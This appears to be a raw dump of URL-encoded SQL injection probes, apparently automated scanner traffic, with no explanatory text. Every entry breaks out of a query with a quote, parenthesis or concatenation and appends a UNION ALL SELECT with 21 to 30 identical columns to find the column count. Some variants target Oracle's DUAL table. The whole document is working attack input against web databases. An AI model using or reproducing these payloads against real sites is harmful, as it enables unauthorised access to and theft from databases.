-5402%22%29%20WHERE%207271%3D7271%20UNION%20ALL%20SELECT%207271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271--%20 -8947%22%29%20WHERE%203010%3D3010%20UNION%20ALL%20SELECT%203010%2C3010%2C3010%2C3010%2C3010%2C3010%2C3010%2C3010%2C3010%2C3010%2C3010%2C3010%2C3010%2C3010%2C3010%2C3010%2C3010%2C3010%2C3010%2C3010%2C3010%2C3010%2C3010%2C3010--%20 -7722%22%29%20WHERE%203783%3D3783%20UNION%20ALL%20SELECT%203783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783--%20 -5542%22%29%20WHERE%204043%3D4043%20UNION%20ALL%20SELECT%204043%2C4043%2C4043%2C4043%2C4043%2C4043%2C4043%2C4043%2C4043%2C4043%2C4043%2C4043%2C4043%2C4043%2C4043%2C4043%2C4043%2C4043%2C4043%2C4043%2C4043%2C4043%2C4043%2C4043%2C4043%2C4043--%20 -3873%22%29%20WHERE%209604%3D9604%20UNION%20ALL%20SELECT%209604%2C9604%2C9604%2C9604%2C9604%2C9604%2C9604%2C9604%2C9604%2C9604%2C9604%2C9604%2C9604%2C9604%2C9604%2C9604%2C9604%2C9604%2C9604%2C9604%2C9604%2C9604%2C9604%2C9604%2C9604%2C9604%2C9604--%20 -5150%22%29%20WHERE%204091%3D4091%20UNION%20ALL%20SELECT%204091%2C4091%2C4091%2C4091%2C4091%2C4091%2C4091%2C4091%2C4091%2C4091%2C4091%2C4091%2C4091%2C4091%2C4091%2C4091%2C4091%2C4091%2C4091%2C4091%2C4091%2C4091%2C4091%2C4091%2C4091%2C4091%2C4091%2C4091--%20 -6513%22%29%20WHERE%204343%3D4343%20UNION%20ALL%20SELECT%204343%2C4343%2C4343%2C4343%2C4343%2C4343%2C4343%2C4343%2C4343%2C4343%2C4343%2C4343%2C4343%2C4343%2C4343%2C4343%2C4343%2C4343%2C4343%2C4343%2C4343%2C4343%2C4343%2C4343%2C4343%2C4343%2C4343%2C4343%2C4343--%20 -3109%22%29%20WHERE%204359%3D4359%20UNION%20ALL%20SELECT%204359%2C4359%2C4359%2C4359%2C4359%2C4359%2C4359%2C4359%2C4359%2C4359%2C4359%2C4359%2C4359%2C4359%2C4359%2C4359%2C4359%2C4359%2C4359%2C4359%2C4359%2C4359%2C4359%2C4359%2C4359%2C4359%2C4359%2C4359%2C4359%2C4359--%20 -3287%29%20WHERE%204750%3D4750%20UNION%20ALL%20SELECT%204750%2C4750%2C4750%2C4750%2C4750%2C4750%2C4750%2C4750%2C4750%2C4750%2C4750%2C4750%2C4750%2C4750%2C4750%2C4750%2C4750%2C4750%2C4750%2C4750%2C4750--%20 -9153%29%20WHERE%205783%3D5783%20UNION%20ALL%20SELECT%205783%2C5783%2C5783%2C5783%2C5783%2C5783%2C5783%2C5783%2C5783%2C5783%2C5783%2C5783%2C5783%2C5783%2C5783%2C5783%2C5783%2C5783%2C5783%2C5783%2C5783%2C5783--%20 -9158%29%20WHERE%202645%3D2645%20UNION%20ALL%20SELECT%202645%2C2645%2C2645%2C2645%2C2645%2C2645%2C2645%2C2645%2C2645%2C2645%2C2645%2C2645%2C2645%2C2645%2C2645%2C2645%2C2645%2C2645%2C2645%2C2645%2C2645%2C2645%2C2645--%20 -3825%29%20WHERE%203672%3D3672%20UNION%20ALL%20SELECT%203672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672%2C3672--%20 -1092%29%20WHERE%203191%3D3191%20UNION%20ALL%20SELECT%203191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191--%20 -8998%29%20WHERE%203916%3D3916%20UNION%20ALL%20SELECT%203916%2C3916%2C3916%2C3916%2C3916%2C3916%2C3916%2C3916%2C3916%2C3916%2C3916%2C3916%2C3916%2C3916%2C3916%2C3916%2C3916%2C3916%2C3916%2C3916%2C3916%2C3916%2C3916%2C3916%2C3916%2C3916--%20 -2853%29%20WHERE%209413%3D9413%20UNION%20ALL%20SELECT%209413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413--%20 -7591%29%20WHERE%209814%3D9814%20UNION%20ALL%20SELECT%209814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814--%20 -2827%29%20WHERE%206534%3D6534%20UNION%20ALL%20SELECT%206534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534--%20 -3995%29%20WHERE%207454%3D7454%20UNION%20ALL%20SELECT%207454%2C7454%2C7454%2C7454%2C7454%2C7454%2C7454%2C7454%2C7454%2C7454%2C7454%2C7454%2C7454%2C7454%2C7454%2C7454%2C7454%2C7454%2C7454%2C7454%2C7454%2C7454%2C7454%2C7454%2C7454%2C7454%2C7454%2C7454%2C7454%2C7454--%20 -3192%27%20WHERE%204787%3D4787%20UNION%20ALL%20SELECT%204787%2C4787%2C4787%2C4787%2C4787%2C4787%2C4787%2C4787%2C4787%2C4787%2C4787%2C4787%2C4787%2C4787%2C4787%2C4787%2C4787%2C4787%2C4787%2C4787%2C4787--%20 -1252%27%20WHERE%204858%3D4858%20UNION%20ALL%20SELECT%204858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858--%20 -1829%27%20WHERE%208533%3D8533%20UNION%20ALL%20SELECT%208533%2C8533%2C8533%2C8533%2C8533%2C8533%2C8533%2C8533%2C8533%2C8533%2C8533%2C8533%2C8533%2C8533%2C8533%2C8533%2C8533%2C8533%2C8533%2C8533%2C8533%2C8533%2C8533--%20 -6845%27%20WHERE%206950%3D6950%20UNION%20ALL%20SELECT%206950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950%2C6950--%20 -1862%27%20WHERE%204983%3D4983%20UNION%20ALL%20SELECT%204983%2C4983%2C4983%2C4983%2C4983%2C4983%2C4983%2C4983%2C4983%2C4983%2C4983%2C4983%2C4983%2C4983%2C4983%2C4983%2C4983%2C4983%2C4983%2C4983%2C4983%2C4983%2C4983%2C4983%2C4983--%20 -3009%27%20WHERE%206447%3D6447%20UNION%20ALL%20SELECT%206447%2C6447%2C6447%2C6447%2C6447%2C6447%2C6447%2C6447%2C6447%2C6447%2C6447%2C6447%2C6447%2C6447%2C6447%2C6447%2C6447%2C6447%2C6447%2C6447%2C6447%2C6447%2C6447%2C6447%2C6447%2C6447--%20 -4809%27%20WHERE%207316%3D7316%20UNION%20ALL%20SELECT%207316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316--%20 -3515%27%20WHERE%206584%3D6584%20UNION%20ALL%20SELECT%206584%2C6584%2C6584%2C6584%2C6584%2C6584%2C6584%2C6584%2C6584%2C6584%2C6584%2C6584%2C6584%2C6584%2C6584%2C6584%2C6584%2C6584%2C6584%2C6584%2C6584%2C6584%2C6584%2C6584%2C6584%2C6584%2C6584%2C6584--%20 -2219%27%20WHERE%203041%3D3041%20UNION%20ALL%20SELECT%203041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041--%20 -7073%27%20WHERE%204589%3D4589%20UNION%20ALL%20SELECT%204589%2C4589%2C4589%2C4589%2C4589%2C4589%2C4589%2C4589%2C4589%2C4589%2C4589%2C4589%2C4589%2C4589%2C4589%2C4589%2C4589%2C4589%2C4589%2C4589%2C4589%2C4589%2C4589%2C4589%2C4589%2C4589%2C4589%2C4589%2C4589%2C4589--%20 -7100%22%20WHERE%206252%3D6252%20UNION%20ALL%20SELECT%206252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252%2C6252--%20 -7724%22%20WHERE%203043%3D3043%20UNION%20ALL%20SELECT%203043%2C3043%2C3043%2C3043%2C3043%2C3043%2C3043%2C3043%2C3043%2C3043%2C3043%2C3043%2C3043%2C3043%2C3043%2C3043%2C3043%2C3043%2C3043%2C3043%2C3043%2C3043--%20 -5589%22%20WHERE%204153%3D4153%20UNION%20ALL%20SELECT%204153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153%2C4153--%20 -5381%22%20WHERE%205078%3D5078%20UNION%20ALL%20SELECT%205078%2C5078%2C5078%2C5078%2C5078%2C5078%2C5078%2C5078%2C5078%2C5078%2C5078%2C5078%2C5078%2C5078%2C5078%2C5078%2C5078%2C5078%2C5078%2C5078%2C5078%2C5078%2C5078%2C5078--%20 -6912%22%20WHERE%202691%3D2691%20UNION%20ALL%20SELECT%202691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691--%20 -3835%22%20WHERE%201368%3D1368%20UNION%20ALL%20SELECT%201368%2C1368%2C1368%2C1368%2C1368%2C1368%2C1368%2C1368%2C1368%2C1368%2C1368%2C1368%2C1368%2C1368%2C1368%2C1368%2C1368%2C1368%2C1368%2C1368%2C1368%2C1368%2C1368%2C1368%2C1368%2C1368--%20 -5520%22%20WHERE%206121%3D6121%20UNION%20ALL%20SELECT%206121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121--%20 -2902%22%20WHERE%208216%3D8216%20UNION%20ALL%20SELECT%208216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216--%20 -3006%22%20WHERE%207053%3D7053%20UNION%20ALL%20SELECT%207053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053--%20 -4255%22%20WHERE%206490%3D6490%20UNION%20ALL%20SELECT%206490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490--%20 -4087%20WHERE%204174%3D4174%20UNION%20ALL%20SELECT%204174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174--%20 -8272%20WHERE%208837%3D8837%20UNION%20ALL%20SELECT%208837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837--%20 -5364%20WHERE%201666%3D1666%20UNION%20ALL%20SELECT%201666%2C1666%2C1666%2C1666%2C1666%2C1666%2C1666%2C1666%2C1666%2C1666%2C1666%2C1666%2C1666%2C1666%2C1666%2C1666%2C1666%2C1666%2C1666%2C1666%2C1666%2C1666%2C1666--%20 -7886%20WHERE%204441%3D4441%20UNION%20ALL%20SELECT%204441%2C4441%2C4441%2C4441%2C4441%2C4441%2C4441%2C4441%2C4441%2C4441%2C4441%2C4441%2C4441%2C4441%2C4441%2C4441%2C4441%2C4441%2C4441%2C4441%2C4441%2C4441%2C4441%2C4441--%20 -8144%20WHERE%207787%3D7787%20UNION%20ALL%20SELECT%207787%2C7787%2C7787%2C7787%2C7787%2C7787%2C7787%2C7787%2C7787%2C7787%2C7787%2C7787%2C7787%2C7787%2C7787%2C7787%2C7787%2C7787%2C7787%2C7787%2C7787%2C7787%2C7787%2C7787%2C7787--%20 -1715%20WHERE%209745%3D9745%20UNION%20ALL%20SELECT%209745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745--%20 -1957%20WHERE%205033%3D5033%20UNION%20ALL%20SELECT%205033%2C5033%2C5033%2C5033%2C5033%2C5033%2C5033%2C5033%2C5033%2C5033%2C5033%2C5033%2C5033%2C5033%2C5033%2C5033%2C5033%2C5033%2C5033%2C5033%2C5033%2C5033%2C5033%2C5033%2C5033%2C5033%2C5033--%20 -2861%20WHERE%201330%3D1330%20UNION%20ALL%20SELECT%201330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330--%20 -3128%20WHERE%206344%3D6344%20UNION%20ALL%20SELECT%206344%2C6344%2C6344%2C6344%2C6344%2C6344%2C6344%2C6344%2C6344%2C6344%2C6344%2C6344%2C6344%2C6344%2C6344%2C6344%2C6344%2C6344%2C6344%2C6344%2C6344%2C6344%2C6344%2C6344%2C6344%2C6344%2C6344%2C6344%2C6344--%20 -8375%20WHERE%208092%3D8092%20UNION%20ALL%20SELECT%208092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092%2C8092--%20 -3014%27%7C%7C%28SELECT%20%27zfwJ%27%20FROM%20DUAL%20WHERE%201244%3D1244%20UNION%20ALL%20SELECT%201244%2C1244%2C1244%2C1244%2C1244%2C1244%2C1244%2C1244%2C1244%2C1244%2C1244%2C1244%2C1244%2C1244%2C1244%2C1244%2C1244%2C1244%2C1244%2C1244%2C1244--%20 -4787%27%7C%7C%28SELECT%20%27sBxb%27%20FROM%20DUAL%20WHERE%208948%3D8948%20UNION%20ALL%20SELECT%208948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948%2C8948--%20 -8731%27%7C%7C%28SELECT%20%27lJxu%27%20FROM%20DUAL%20WHERE%205103%3D5103%20UNION%20ALL%20SELECT%205103%2C5103%2C5103%2C5103%2C5103%2C5103%2C5103%2C5103%2C5103%2C5103%2C5103%2C5103%2C5103%2C5103%2C5103%2C5103%2C5103%2C5103%2C5103%2C5103%2C5103%2C5103%2C5103--%20 -2053%27%7C%7C%28SELECT%20%27DOYP%27%20FROM%20DUAL%20WHERE%205155%3D5155%20UNION%20ALL%20SELECT%205155%2C5155%2C5155%2C5155%2C5155%2C5155%2C5155%2C5155%2C5155%2C5155%2C5155%2C5155%2C5155%2C5155%2C5155%2C5155%2C5155%2C5155%2C5155%2C5155%2C5155%2C5155%2C5155%2C5155--%20 -8628%27%7C%7C%28SELECT%20%27fxki%27%20FROM%20DUAL%20WHERE%202665%3D2665%20UNION%20ALL%20SELECT%202665%2C2665%2C2665%2C2665%2C2665%2C2665%2C2665%2C2665%2C2665%2C2665%2C2665%2C2665%2C2665%2C2665%2C2665%2C2665%2C2665%2C2665%2C2665%2C2665%2C2665%2C2665%2C2665%2C2665%2C2665--%20 -3358%27%7C%7C%28SELECT%20%27TMGK%27%20FROM%20DUAL%20WHERE%206442%3D6442%20UNION%20ALL%20SELECT%206442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442--%20 -4139%27%7C%7C%28SELECT%20%27iobv%27%20FROM%20DUAL%20WHERE%209451%3D9451%20UNION%20ALL%20SELECT%209451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451%2C9451--%20 -2037%27%7C%7C%28SELECT%20%27gnvD%27%20FROM%20DUAL%20WHERE%206461%3D6461%20UNION%20ALL%20SELECT%206461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461--%20 -1274%27%7C%7C%28SELECT%20%27RJsJ%27%20FROM%20DUAL%20WHERE%208796%3D8796%20UNION%20ALL%20SELECT%208796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796--%20 -5023%27%7C%7C%28SELECT%20%27jqBi%27%20FROM%20DUAL%20WHERE%201956%3D1956%20UNION%20ALL%20SELECT%201956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956%2C1956--%20 -8502%27%7C%7C%28SELECT%20%27liWO%27%20WHERE%201686%3D1686%20UNION%20ALL%20SELECT%201686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686--%20 -5694%27%7C%7C%28SELECT%20%27YGqA%27%20WHERE%205922%3D5922%20UNION%20ALL%20SELECT%205922%2C5922%2C5922%2C5922%2C5922%2C5922%2C5922%2C5922%2C5922%2C5922%2C5922%2C5922%2C5922%2C5922%2C5922%2C5922%2C5922%2C5922%2C5922%2C5922%2C5922%2C5922--%20 -7196%27%7C%7C%28SELECT%20%27Uytm%27%20WHERE%209600%3D9600%20UNION%20ALL%20SELECT%209600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600--%20 -7670%27%7C%7C%28SELECT%20%27bFUr%27%20WHERE%207048%3D7048%20UNION%20ALL%20SELECT%207048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048%2C7048--%20 -1424%27%7C%7C%28SELECT%20%27NUDZ%27%20WHERE%203017%3D3017%20UNION%20ALL%20SELECT%203017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017%2C3017--%20 -9121%27%7C%7C%28SELECT%20%27RTeu%27%20WHERE%209433%3D9433%20UNION%20ALL%20SELECT%209433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433%2C9433--%20 -6597%27%7C%7C%28SELECT%20%27NlqN%27%20WHERE%202451%3D2451%20UNION%20ALL%20SELECT%202451%2C2451%2C2451%2C2451%2C2451%2C2451%2C2451%2C2451%2C2451%2C2451%2C2451%2C2451%2C2451%2C2451%2C2451%2C2451%2C2451%2C2451%2C2451%2C2451%2C2451%2C2451%2C2451%2C2451%2C2451%2C2451%2C2451--%20 -7439%27%7C%7C%28SELECT%20%27mNZk%27%20WHERE%205851%3D5851%20UNION%20ALL%20SELECT%205851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851--%20 -2711%27%7C%7C%28SELECT%20%27JJXd%27%20WHERE%206871%3D6871%20UNION%20ALL%20SELECT%206871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871%2C6871--%20 -1528%27%7C%7C%28SELECT%20%27bwim%27%20WHERE%202285%3D2285%20UNION%20ALL%20SELECT%202285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285%2C2285--%20 -9547%27%2B%28SELECT%20Vayg%20WHERE%209020%3D9020%20UNION%20ALL%20SELECT%209020%2C9020%2C9020%2C9020%2C9020%2C9020%2C9020%2C9020%2C9020%2C9020%2C9020%2C9020%2C9020%2C9020%2C9020%2C9020%2C9020%2C9020%2C9020%2C9020%2C9020--%20 -5072%27%2B%28SELECT%20Arbu%20WHERE%206445%3D6445%20UNION%20ALL%20SELECT%206445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445%2C6445--%20 -1411%27%2B%28SELECT%20FOsU%20WHERE%209910%3D9910%20UNION%20ALL%20SELECT%209910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910%2C9910--%20 -3588%27%2B%28SELECT%20Wega%20WHERE%204174%3D4174%20UNION%20ALL%20SELECT%204174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174%2C4174--%20 -7992%27%2B%28SELECT%20korl%20WHERE%205360%3D5360%20UNION%20ALL%20SELECT%205360%2C5360%2C5360%2C5360%2C5360%2C5360%2C5360%2C5360%2C5360%2C5360%2C5360%2C5360%2C5360%2C5360%2C5360%2C5360%2C5360%2C5360%2C5360%2C5360%2C5360%2C5360%2C5360%2C5360%2C5360--%20 -7597%27%2B%28SELECT%20gmXP%20WHERE%209517%3D9517%20UNION%20ALL%20SELECT%209517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517--%20 -2469%27%2B%28SELECT%20enyM%20WHERE%206439%3D6439%20UNION%20ALL%20SELECT%206439%2C6439%2C6439%2C6439%2C6439%2C6439%2C6439%2C6439%2C6439%2C6439%2C6439%2C6439%2C6439%2C6439%2C6439%2C6439%2C6439%2C6439%2C6439%2C6439%2C6439%2C6439%2C6439%2C6439%2C6439%2C6439%2C6439--%20 -9493%27%2B%28SELECT%20qDwL%20WHERE%205194%3D5194%20UNION%20ALL%20SELECT%205194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194--%20 -9401%27%2B%28SELECT%20esmJ%20WHERE%202170%3D2170%20UNION%20ALL%20SELECT%202170%2C2170%2C2170%2C2170%2C2170%2C2170%2C2170%2C2170%2C2170%2C2170%2C2170%2C2170%2C2170%2C2170%2C2170%2C2170%2C2170%2C2170%2C2170%2C2170%2C2170%2C2170%2C2170%2C2170%2C2170%2C2170%2C2170%2C2170%2C2170--%20 -6938%27%2B%28SELECT%20FGlR%20WHERE%202890%3D2890%20UNION%20ALL%20SELECT%202890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890--%20 -6544%27%2B%28SELECT%20%27yzcB%27%20WHERE%207596%3D7596%20UNION%20ALL%20SELECT%207596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596--%20 -7905%27%2B%28SELECT%20%27bFAF%27%20WHERE%203739%3D3739%20UNION%20ALL%20SELECT%203739%2C3739%2C3739%2C3739%2C3739%2C3739%2C3739%2C3739%2C3739%2C3739%2C3739%2C3739%2C3739%2C3739%2C3739%2C3739%2C3739%2C3739%2C3739%2C3739%2C3739%2C3739--%20 -6223%27%2B%28SELECT%20%27EfEr%27%20WHERE%208422%3D8422%20UNION%20ALL%20SELECT%208422%2C8422%2C8422%2C8422%2C8422%2C8422%2C8422%2C8422%2C8422%2C8422%2C8422%2C8422%2C8422%2C8422%2C8422%2C8422%2C8422%2C8422%2C8422%2C8422%2C8422%2C8422%2C8422--%20 -2520%27%2B%28SELECT%20%27QAXf%27%20WHERE%207221%3D7221%20UNION%20ALL%20SELECT%207221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221%2C7221--%20 -9013%27%2B%28SELECT%20%27uYZU%27%20WHERE%203913%3D3913%20UNION%20ALL%20SELECT%203913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913--%20 -7840%27%2B%28SELECT%20%27rcWg%27%20WHERE%208854%3D8854%20UNION%20ALL%20SELECT%208854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854--%20 -3602%27%2B%28SELECT%20%27YIdR%27%20WHERE%203823%3D3823%20UNION%20ALL%20SELECT%203823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823%2C3823--%20 -9617%27%2B%28SELECT%20%27SvdH%27%20WHERE%206205%3D6205%20UNION%20ALL%20SELECT%206205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205--%20 